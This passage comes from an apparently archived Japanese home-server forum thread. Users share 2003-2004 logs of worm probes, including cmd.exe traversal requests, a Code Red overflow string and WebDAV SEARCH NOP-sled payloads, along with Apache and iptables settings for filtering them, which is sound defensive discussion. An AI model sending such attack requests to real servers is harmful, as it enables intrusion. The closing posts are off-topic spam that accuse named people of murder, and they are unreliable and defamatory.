当ててたとしたら、肝心の駆除してねぇヤツ多すぎ。 全部 bbtec.net 遮断に決定。俺は困らねぇし。 UDP LOOPアタックくらいまくりなんですがどうしたらいいですか? 特定の相手難ですが。 2003/09/21(23:14:55) W-SV 218.188.110.35 [80] 404 242 "GET /scripts/root.exe?/c+dir HTTP/1.0" 2003/09/21(23:15:01) W-SV 218.188.110.35 [80] 404 240 "GET /msadc/root.exe?/c+dir HTTP/1.0" 2003/09/21(23:15:06) W-SV 218.188.110.35 [80] 404 250 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2003/09/21(23:15:12) W-SV 218.188.110.35 [80] 404 250 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" パッチ当ててない鯖って周りにも迷惑かけて最悪だな ahooBBキター 2003/09/22(00:25:32) W-SV YahooBB218125088142.bbtec.net(218.125.88.142) [80] 404 242 "GET /scripts/root.exe?/c+dir HTTP/1.0" 2003/09/22(00:25:33) W-SV YahooBB218125088142.bbtec.net(218.125.88.142) [80] 404 240 "GET /msadc/root.exe?/c+dir HTTP/1.0" 2003/09/22(00:25:33) W-SV YahooBB218125088142.bbtec.net(218.125.88.142) [80] 404 250 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2003/09/22(00:25:33) W-SV YahooBB218125088142.bbtec.net(218.125.88.142) [80] 404 250 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2003/09/22(00:25:33) W-SV YahooBB218125088142.bbtec.net(218.125.88.142) [80] 403 262 "GET /scripts/..\../winnt/system32/cmd.exe?/c+dir HTTP/1.0" IPアドレスを変えてSEARCHをかけて来てます、どうしたらいいでしょうか? これずっとやられて、アクセス数がどんどん増えて行ってしまいます。 同時接続数が限られる環境でこの攻撃は痛いです。 だれか辞めさせる手段をご教授お願いします。 2003-09-22 11:56:38 140.112.88.18 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 11:58:03 67.128.66.123 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 11:58:04 67.128.66.123 - "" SEARCH / - 411 - 2003-09-22 12:07:06 12.168.146.99 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:07:06 12.168.146.99 - "" SEARCH / - 411 - 2003-09-22 12:10:31 62.254.0.18 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:10:31 62.254.0.18 - "" SEARCH / - 411 - 2003-09-22 12:12:38 202.64.33.192 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:12:38 202.64.27.183 - "" SEARCH / - 411 - 2003-09-22 12:13:48 81.152.119.97 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:13:48 81.152.119.97 - "" SEARCH / - 411 - 2003-09-22 12:18:41 80.222.212.13 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:18:42 80.222.212.13 - "" SEARCH / - 411 - 2003-09-22 12:19:39 194.100.73.249 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:19:39 194.100.73.249 - "" SEARCH / - 411 - 2003-09-22 12:22:34 219.0.96.166 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:22:34 219.0.96.166 - "" SEARCH / - 411 - 2003-09-22 12:31:35 81.106.226.196 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:31:36 81.106.226.196 - "" SEARCH / - 411 - 2003-09-22 12:33:22 220.36.28.75 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:33:22 220.36.28.75 - "" SEARCH / - 411 - 2003-09-22 12:39:38 68.75.21.33 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:39:38 68.75.21.33 - "" SEARCH / - 411 - 2003-09-22 12:49:59 4.65.242.242 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:49:59 4.65.242.242 - "" SEARCH / - 411 - 2003-09-22 12:50:56 61.242.82.156 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:50:56 61.242.82.156 - "" SEARCH / - 411 - 2003-09-22 12:52:25 68.122.155.202 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:52:25 68.122.155.202 - "" SEARCH / - 411 - 2003-09-22 12:52:55 63.196.240.140 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:52:57 63.196.240.140 - "" SEARCH / - 411 - 2003-09-22 12:57:34 67.115.71.91 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:57:34 67.115.71.91 - "" SEARCH / - 411 - 2003-09-22 12:58:18 217.32.133.75 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:58:21 217.32.133.75 - "" SEARCH / - 411 - 2003-09-22 13:01:16 138.23.162.248 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 13:01:16 138.23.162.248 - "" SEARCH / - 411 - うちのSnortSnarfの警告ページね。 2つの異なるイグネチャーが219.96.206.60として存在しています。発信源 ・65個の事例はWEB-IIS ISAPI .ida attempt ・65個の事例はWEB-IIS cmd.exe access ここ学校なんだよね〜 あまりにウザイからwhoisでわざわざ調べて メールで教えてあげようと思ったら。 failure noticeときたもんだ! 管理ちゃんとしようよー >>234 219.96.206.60 = haruna.kibou.ed.jp 適当にpostmaster@とかwebmaster@に送ってみたらどうよ いまだにcoderedとかに感染している奴氏んでしまえばいいのに WINNTAutoAttackっていうんですかこれ? 221.194.178.13 - - [02/Nov/2003:14:52:31 +0900] "GET /NULL.IDA?CCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%u898b%u77e8% u0000%u0000%u838b%u0094%u0000%u408b%u0564%u0150%u0000%ue0ff%u9090=x&\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 (以下略) 中国人かな? taro.eco.saitama-u.ac.jp - - [20/Nov/2003:10:48:04 +0900] "GET /scripts/nsiislog.dll HTTP/" 404 http://www.symantec.com/region/jp/sarcj/data/h/hacktool.wsrshell.html Hacktool.WKRShell セキュリティホール memo http://www.st.ryukoku.ac.jp/ ~kjm/security/memo/ Workstation サービスのバッファオーバーランにより、コードが実行される (828749) (MS03-049) http://www.st.ryukoku.ac.jp/ ~kjm/security/memo/#20031112_MS03-049 EEYE: Windows Workstation Service Remote Buffer Overflow (eEye、2003.11.12) http://www.st.ryukoku.ac.jp/ ~kjm/security/ml-archive/bugtraq/2003.11/msg00140.html MS03-049が危険な理由 (ZDNet) http://www.zdnet.co.jp/enterprise/0311/14/epn02.html 最近こんなのばっか 213.242.186.162 - - [30/Nov/2003:12:24:12 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" adsl-68-90-244-157.dsl.hstntx.swbell.net - - [30/Nov/2003:12:24:18 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" dyn-greek-180-227.dyn.columbia.edu - - [30/Nov/2003:12:25:06 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 63.172.94.170 - - [30/Nov/2003:12:27:53 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" adsl-63-202-55-65.dsl.frsn01.pacbell.net - - [30/Nov/2003:12:28:01 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" cache-2.sfrn.ca.webcache.rcn.net - - [30/Nov/2003:12:28:24 +0900] "GET / HTTP/1.0" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 061092205038.ctinets.com - - [30/Nov/2003:12:30:20 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" alb-24-194-36-62.nycap.rr.com - - [30/Nov/2003:12:32:56 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" adsl-66-143-248-208.dsl.snantx.swbell.net - - [30/Nov/2003:12:35:24 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" h-68-165-88-115.nycmny83.covad.net - - [30/Nov/2003:12:35:44 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 誰か対処法教えて…ログがわけわかんなくなる ウチは、ルータで Directed Broadcast 破棄しといた 65-86-200-30.client.dsl.net - - [30/Nov/2003:20:32:26 +0900] "GET /scripts/nsiislog.dll" 404 315 -% アメリカより。 >>245 うちのルータもpingを排除したら迷惑な香具師も少なくなりますた 一日1500くらいアタックがくるよ。 一分に一回程度。 やんなっちゃう。 真っ当なアクセスなら1500って夢のような数字だけどさ ルータ新しいのにかえようかなあ pingを排除できるルータがあるんならかえたい。 けど、金ない。 よわったのお >>247 iptables -A INPUT -p icmp -i ppp+ -j DROP スレ違いレス なんかこのスレ見て自分の鯖が心配になってきた。 確認する方法と防ぐ方法きぼんぬ。 OSがWindowsならWindowsUpだて汁! 他のOSはシラネ >>249 鯖の電源切れば心配しなくてもよくなるYO 同じIPから毎日のように来るので 調べてみたらどうやらクライアント機らしい。 同じ時間帯に集中するのは、その時間帯に電源入れてるから。 updateやウイルスチェックぐらいしろと… 巛彡彡ミミミミミ彡彡 巛巛巛巛巛巛巛彡彡 r、r.r 、|::::: | r |_,|_,|_,||:::::: ⌒ ⌒| |_,|_,|_,|/⌒ -="- (-=" |_,|_,|_人そ(^i '"" ) ・ ・)""ヽ | ) ヽノ |. ┃`ー-ニ-イ`┃ そうでっか、そうでっか、なるほどね | `".`´ ノ ┃ ⌒ ┃| 人 入_ノ´ ┃ ┃ノ\ / \_/\\ ┗━━┛/ \\ / \ ト ───イ/ ヽヽ / ` ─┬─ イ i i / | Y | | / | ヽ__|_| 巛彡彡ミミミミミ彡彡 巛巛巛巛巛巛巛彡彡 r、r.r 、|::::: | r |_,|_,|_,||:::::: /' '\ | |_,|_,|_,|/⌒ (・ ) (・ )| |_,|_,|_人そ(^i ⌒ ) ・・)'⌒ヽ | ) ヽノ |. ┏━━━┓| | `".`´ ノ ┃ ノ ̄i ┃| 人 入_ノ´ ┃ヽニニノ┃ノ\ ・・・・で?seireiやnekoninがサービス悪いとでもいいたいの? / \_/\\ ┗━━┛/|\\ / \ ト ───イ/ ヽヽ / ` ─┬─ イ i i / | Y | >>247 1500アタック/日?普通だよ、普通。 >>249 FW・フィルタ付きのルータを導入し、SYSLOGを見れ。 最近、時々来る "GET /sumthin"が不気味だな。 200.119.14.xxx - - [11/Feb/2004:00:28:41 +0900] "GET /sumthin HTTP/1.0" 404 3720 "-" "-" >>257 それはサムスンの綴りを間違えたのです。 ってのは冗談で、 ググるとすこしはわかるかもしれませんよ。 ワームじゃないんだけど 韓国からのアクセスが多い、 ログにIPは違うけどIE 5.5 Windows98がずらっと並んでるんだよね 鯖立てたばかりでHPも工事中でTOPページだけ、アクセスなんて殆ど無いのに、 一時間に3回ぐらいの割合で入ってる 毎回違う串さして同一人物がやってるんだろうか… 他にログが無くてこればっかり並んでるから激しく怖い Windows98のIE5.5を詐称するならワーム たしかWelchiaとかいう 218.108.238.159 - - [08/Mar/2004:19:26:05 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-" 218.79.212.100 - - [08/Mar/2004:20:58:49 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-" 218.13.247.16 - - [09/Mar/2004:12:23:38 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-" 218.84.159.6 - - [09/Mar/2004:12:53:39 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-" 218.0.209.6 - - [09/Mar/2004:15:06:01 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-" 218.13.49.63 - - [09/Mar/2004:15:51:22 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-" 218.23.96.176 - - [09/Mar/2004:16:07:40 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-" 218.94.194.252 - - [09/Mar/2004:22:55:53 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-" 218.29.237.46 - - [09/Mar/2004:23:47:40 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-" 61.235.111.183 - - [10/Mar/2004:08:45:59 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-" 61.46.6.210 - - [10/Mar/2004:09:27:14 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-" 61.51.241.47 - - [10/Mar/2004:10:11:14 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-" 61.178.173.142 - - [10/Mar/2004:15:35:39 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-" 61.210.180.3 - - [10/Mar/2004:18:02:40 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-" 61.92.10.199 - - [10/Mar/2004:18:59:06 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-" 61.232.181.151 - - [10/Mar/2004:21:36:15 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-" 61.92.205.94 - - [11/Mar/2004:03:39:46 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-" 218.61.20.56 - - [12/Mar/2004:01:41:09 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-" 219.133.182.176 - - [10/Mar/2004:13:48:10 +0900] "SEARCH /\x90\x02\xb1(略)x90\x90\x90\x90" 414 271 "-" "-" 219.145.4.26 - - [10/Mar/2004:20:28:03 +0900] "SEARCH /\x90\x02\xb1(略)x90\x90\x90\x90" 414 271 "-" "-" 219.133.125.221 - - [11/Mar/2004:00:34:39 +0900] "SEARCH /\x90\x02\xb1(略)x90\x90\x90\x90" 414 271 "-" "-" FTPでいろんなアカウントとパスを組み合わせてくるやつが居るけど、 あれは単に割れ鯖をさがしてるクローラー? usen-221x114x94x213.ap-us01.usen.ad.jp - - [22/Mar/2004:16:29:42 +0900] "SEARCH /\x90\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x0 2\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x0 2\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1(ry ('-`).。oO(鬱陶しいことこの上ないのだが 220.145.233.60 - - [31/Mar/2004:10:29:15 +0900] "SEARCH /\x90\x02\ (ry 大量にキテル…しかも1リクエストに32Kbyteもある… 鯖ではないだろうけど、ウイルス対策くらいしっかりしてほしいなぁ ログを切り分けたいのですが上手くいかね。 SetEnvIf Request_URI "^/\\x90\\x02" worm nolog SetEnvIf Request_URI "^/\x90\x02" worm nolog アドバイスよろ。 >>267 ありがと,そっちのスレはチェックしてませんでした。 SetEnvIf じゃ分けれませんか(´・ω・`)ショボーン >>268 なんとな〜くだけど、vhost使って分けられそうな気がしない? 大抵のウィルスはhostを名乗らないので、別けられそうな気がする とか思いつつ、俺は放置してるわけだが いい機会なんで試してみたが、分離は可能でした 結果だけ報告 >>266 パイプ経由のロギングを利用するのはどうよ? CustomLog "|/root/sh/logfilter >> /var/log/httpd/access_log" combined env=!nolog とでもして、/root/sh/logfilterスクリプト内で"SEARCH /\x90\x02\…"は弾くようにするとか。 267のリンク先の814だが。 Mac 板の UNIX スレだか鯖スレだかにも書いたような気がするが、 <VirtualHost> で分離するのは当然有効。 ワーム以外にも踏台探しのアフォによるアクセスも隔離できることが多いのでオススメ。 あるいは、「異常なログを隔離する」ではなく、 CustomLog /dev/null common CustomLog /path/to/access_log combined env=REMOTE_ADDR のように、環境変数が正常にセットされているもののみ隔離するという方法でも できそうだが、これはうまくいくかどうかは試していない。 >>272 <VirtualHost>でhost名を知らないアクセス=ワームを分離する方法ですが、 これだとローカルからのIP直打ちアクセスも分離されてしまうんじゃないでしょうか。 わざわざ串を刺すのはちょっと…。 >>273 うちのルータ(というより*BSD箱だけど)はグローバルIPでアクセスしても応答してくれるから問題は無いし hosts に書くかDNS鯖に細工をすれば対処できませんか? それに自分のアクセスがログに記録されないぐらいならデバック時以外は被害は少ないと思われ 272だが。 IP 直打ちでも Host: にその IP アドレスが入るので、 プライベートアドレスを ServerAlias に指定すればよし。 NameVirtualHost * <VirtualHost *> ServerName dummy.host CustomLog [隔離ログ] ... </VirtualHost> <VirtualHost *> ServerName xxx.yyy.zzz ServerAlias localhost 127.0.0.1 192.168.0.1 ... CustomLog [ほんとのログ] ... </VirtualHost> このように設定すれば、Host: がないか、あってもグローバルの IP アドレスの場合は dummy.host の設定が使われる。 >>274-275 大変参考になりました。 で、>>261 他のログを分離できたとはいえ、そのままではログファイルを圧迫することに変わりないので アクセスログの書式も \"%r\" → \"%m %!414U %H\" として、414(HTTP_REQUEST_URI_TOO_LARGE)のときはURLを記録しないように、 ついでにクソ長いクエリ送ってくるワーム用にクエリ文字列を記録しないよう変更しました。 ワーム用の<VirtualHost>設定でDocumentRootを/dev/nullにしちゃうのはマズいでしょうか? SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90 で来るヤツって www のホスト名で来てませんか? >>276 レスありがとうございます。あれから調べてみたところ、どうやら/dev/nullや/dev/zeroといった 特殊デバイスはApacheではアクセスできないようになっているみたいですね。 実験的にDocumentRootに設定してみましたが、エラーログには [Tue Apr 6 12:34:56 2004] [error] [client xxx.xxx.xxx.xxx] object is not a file, directory or symlink: /dev/zero と、/var/hogeのように存在しないディレクトリを設定した時と同じエラーが記録されていました。 まあワームにわざわざディレクトリを用意するのも馬鹿らしいので、/dev/zero指定にしようと思います。 誘導されてきました. SEARCHとかのワーム攻撃を避けるために, NGSecureWeb for Linux http://canon-sol.jp/product/ng/index.html とか SRP(Secure Reverse Proxy) http://www.gomibako.com/ ~umesan/srp/ とか使ってる人います?役に立ちますかね? >>285 個人で鯖立ててる分には>>260 以降の対策で十分なので要らないな。 まあわざわざ製品を使おうと考えてるところを見ると、業務用なんだろうけど。 >>286 ここは自宅鯖板 で、名前にsageを入れる意味は何なんだろう 自宅で鯖っつか社長の趣味で意味無く鯖立てたとか 最近のウィルスによるアクセスはその人達が原因かな WOLでスタンバイにしているが、すぐに起動してしまうのは、ワームのせいなのかよ・・・。 ●.....●..●..●...●●..●●...●●..●●●....●●●●..●●.....●●●..●..● 無料のウイルス対策ソフトなどのセキュリティソフト一覧 http://www.geocities.co.jp/SiliconValley-Cupertino/2010/security.html ●.●.●.●..●...●●.●..●●.●●......●..●●...●●...●●●.....●.●...● 感染しているPCを持っているユーザーに通知してあげたい HPがあってメルアド書いててくれたら一番、楽なんだけどね Windowsのメッセージサービスだっけ? あれって日本語も通るんだっけ? 気づいてくれないかなぁ・・・ 218.114.60.82 - - [21/Jun/2004:21:55:14 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1042 "-" "-" >>296 messengerサービスは日本語通るよ。 ほらよ。 ワームの場合やポートスキャンなどのIPアドレスベースのアクセスは、クエリを ログに保存しない。かつ、すべてのリクエストを拒否する。 おまけで、拒否した403エラーをerror_logにも残さない。 LogFormat "%h %l %u %t \"%m %U %H\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %T" attacked LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %T" combined # Reject IP Adress Access <VirtualHost XXX.XXX.XXX.XXX:80> CustomLog logs/access_log attacked ErrorLog /dev/null <Directory ~ ".*"> Order deny,allow Deny from all </Directory> </VirtualHost> <VirtualHost XXX.XXX.XXX.XXX:80> ServerName www.example.com DocumentRoot /usr/local/apache/htdocs ServerAdmin webmaster@www.example.com CustomLog logs/example_access_log extended combined ErrorLog logs/example_error_log </VirtualHost> <VirtualHost XXX.XXX.XXX.XXX:80> … </VirtualHost> <VirtualHost XXX.XXX.XXX.XXX:80> … </VirtualHost> 218.88.235.240 - - [23/Jul/2004:03:00:50 +0900] "GET /NULL.IDA?CCCCCCCCCCCCCCCCCCCC・・・ アクセスしてみたら中国のサイトみたいだけど・・・ >>301 それアタックツールじゃない? WinNTAutoAttackっていうやつ 203.205.99.199 - - [22/Jul/2004:01:33:57 +0900] "\xc8C\xc0\x1d" 501 - "-" "-" 203.205.99.199 - - [22/Jul/2004:01:34:44 +0900] "HZ\xc0\x1d" 501 - "-" "-" 203.205.99.199 - - [22/Jul/2004:01:38:12 +0900] "0\x9f\xc0\x1d" 501 - "-" "-" 最近、こういうのが来るようになったんですけど.... >>303 うちにも来てますね。同じようなの。 メソッドがなくて、リクエスト文字列はバラバラ。 なんらかのワームと思われますけど、 共通の指紋がなくて検索に掛からずいまだ正体不明です。 Googlebotってのが怖い・・・ 誰か助けて。 >>305 やべーよ、それに狙われたら終わりだよ。 個人情報全部抜かれてるよ、きっと。 >>305 うちなんかあえてGooglebotが来やすいように対策して 相手をはめてやろうと頑張ってるんだけど全然こないよ orz >>307 もしかして、昔、嘘教えられた人? Googlebotに来て欲しいなら、robots.txt に User-Agent: * Disallow: / て、書いちゃダメだよ。 人違いならイイんだけど、昔、検索サイトに登録されたいのでロボットに 来て欲しいという人に対して、上記ファイルを書けばロボットが来てくれる と嘘を教えた人が居たから。 今でも嘘を信じてロボットを待ってるとしたら可哀想で。。。 >308 スレ違い。 # robots.txt を置いて検索蹴っていたとしても、ロボットが来なくなる # わけじゃない。 # robots.txtは探すから。 # # それすら来ない(accessログに残っていない)なら、、、 # # # まぁ、イ` とだけ言っておこう。 先方へのお知らせ用のテンプレートってないでしょうかか? やられていると思われるサーバーから当方のサーバーに、 SSHで進入しようとしたログを見つけました。 国内のとある建築デザイン会社のネットワーク内からなんですが。 お知らせしてあげようかなと思うものの、 一からメール起こすのもなんだかなぁと。 jedle.ms.mff.cuni.cz - - [31/Jul/2004:01:10:41 +0900] "GET /cgi-bin/openwebmail/openwebmail.pl(以下略) dns.520net.to - - [31/Jul/2004:15:58:28 +0900] "GET /cgi-bin/openwebmail/openwebmail.pl(以下略) こんなんもいっぱい来る…って、ワームじゃなくて故意か(^^; Virtual Host の設定例ですよん。 NameVirtualHost * ## default (unknown) domain <VirtualHost *> ServerName localhost DocumentRoot /web/unknown ErrorLog "|bin\rotatelogs.exe logs/unknown/error_%Y%m%d.log 86400 540" CustomLog "|bin\rotatelogs.exe logs/unknown/access_%Y%m%d.log 86400 540" common HostnameLookups On <Directory "/web/unknown"> Options None AllowOverride None Order deny,allow Deny from all </Directory> </VirtualHost> ## abcdefg.com <VirtualHost *> ServerName abcdefg.com DocumentRoot /web/abcdefg.com ErrorLog "|bin\rotatelogs.exe logs/abcdefg.com/error_%Y%m%d.log 86400 540" CustomLog "|bin\rotatelogs.exe logs/abcdefg.com/access_%Y%m%d.log 86400 540" common <Directory "/web/abcdefg.com"> Options ExecCGI AllowOverride All Order allow,deny Allow from all </Directory> </VirtualHost> ## vwxyx.info <VirtualHost *> ServerName vwxyx.info DocumentRoot /web/vwxyx.info ErrorLog "|bin\rotatelogs.exe logs/vwxyx.info/error_%Y%m%d.log 86400 540" CustomLog "|bin\rotatelogs.exe logs/vwxyx.info/access_%Y%m%d.log 86400 540" common <Directory "/web/vwxyx.info"> Options ExecCGI AllowOverride All Order allow,deny Allow from all </Directory> </VirtualHost> 一個目の設定は二個目三個目の設定に合致しなかったときに評価されるので自然と IP 直打ちによるアクセスと判断可能。 そして、IP 直打ちは access deny に設定する。 web/unknown 自体も作成しない。 あとね、ログを取らないってのはやめたほうがいいと思う。 ログを見て 「こういうアタックのされ方もあるんだな」 っていう知識にもなると思うわけですよ。 /web/unknownをdenyにすると、ワームのアクセスがあるたびに エラーログに client denied by server configuration: /web/unknown が残ってウザくないか? それがなぜかですね、 request failed: URI too long としか書かれてない。 >>313 > あとね、ログを取らないってのはやめたほうがいいと思う。 > ログを見て 「こういうアタックのされ方もあるんだな」 っていう知識にもなると思うわけですよ。 言ってる事はもっともだ でも、最近普通のlogすらチェックしてる時間無くて… とりあえず、ありもしないページを要求してきたら、そのIP近辺はまとめてアクセス規制かけるようにしてる。 っつーかこのスレ来るような奴は基本的に分かってない。 219.157.121.142 こんなのが・・・・・ 219.154.151.29 219.154.8.152 219.154.151.29 YahooBB219037248174.bbtec.net 記念かきこんぶ 221.137.138.141 221.14.244.126 >>324 その通り。 努力が足りない非正規雇用の増加や、 正社員の中にもサービス残業が嫌だなどという甘えた輩が増えていることは その証拠でしょうね。 The genre began to expand near the turn of century with the development of dime novels and pulp magazines. , These are the people he feels at ease with, whose working methods he respects. , ∧_∧ ( ・∀・) 人 ガッ ( つ―-‐-‐-‐-‐-‐○ < >__Λ∩ 人 Y ノ. V`Д´)/ し(_) / ←>>114 1だが、このスレまだ残ってるんだな。 保守がてらあげておこう。 だめだって(~_~;)そとはだめ(。-_-。)はいきゅうみすですよこれはf^_^;) 【緊急】自衛隊内部で事件発生か!? 東海ア マ 北濱さんを殺害したのか? ニセモノよ! どこに遺体を埋めたんだ? https://twitter.com/tok aiama/status/779592042154299392 君らが北濱さんを殺害して遺体を埋めるとすれば信太山演習場だろうな https://twitter.com/tok aiama/status/779592576550567936 すぐにカマに引っかかってくれる、とても素直な性格だね 労せずして君たちが殺害犯であることがよく分かる 君たちの知能程度もよく分かる 君たちが消してしまった、北濱さんの自衛隊内イジメ記事への評論を見れば誰でも君たちが自衛隊員であることが分かる https://twitter.com/tok aiama/status/779600074561073152 「信太山演習場に遺体を埋めた」と書いた直後に急に激しく反応してるね 友人の自衛官に頼んで信太山演習場内に掘り返し跡がないか調べてもらう予定だったが、 そこまで反応すると真実性が高そうだ https://twitter.com/tok aiama/status/779602473660981248 とうとう北濱幹也のニセモノにブロックされてしまった 北濱さんの遺体を信太山演習場に埋めたと書いたら、もの凄い反応だった https://twitter.com/tok aiama/status/779608668136284160 20時5分 無言の不審電話がかかってきた たぶんニセ北濱グループだろうね いよいよ襲ってくるのかな? https://twitter.com/tok aiama/status/779637957649063937 私は元創価の会員でした。 すぐ隣に防衛省の背広組の官舎があるのですが、 自分の家の窓にUSB接続のwebカメラを貼り付けて、そこの動画を撮影し続け、 学会本部に送っていました。 別に大したものは写っていません。ゴミ出しとか奥さんが子供を遊ばせている所とか。 官舎が老朽化して使われなくなってから、 今まで法人税(うちは自営業です)をほぼ払わなくても済んでいたのが、 もう守ってやれないのでこれからは満額申告するように言われました。 納得がいかないと言うと、君は自業自得で餓鬼地獄へ落ちる、 朝夕南無妙法蓮華経と三千回ずつ唱えて心をきれいにしなさいと言われ 馬鹿らしくなって脱会しました。 それ以来、どこへ行くにもぞろ目ナンバーの車につけまわされたり大変な日々です。 全部自分の出来心から始まった事で、どこに訴えるわけにもいかないのですが、 なんとかあの人たちと縁を切った上で新しい始まりを迎える方法はないんだろうか。 read.cgi ver 07.5.5 2024/06/08 Walang Kapalit ★ | Donguri System Team 5ちゃんねる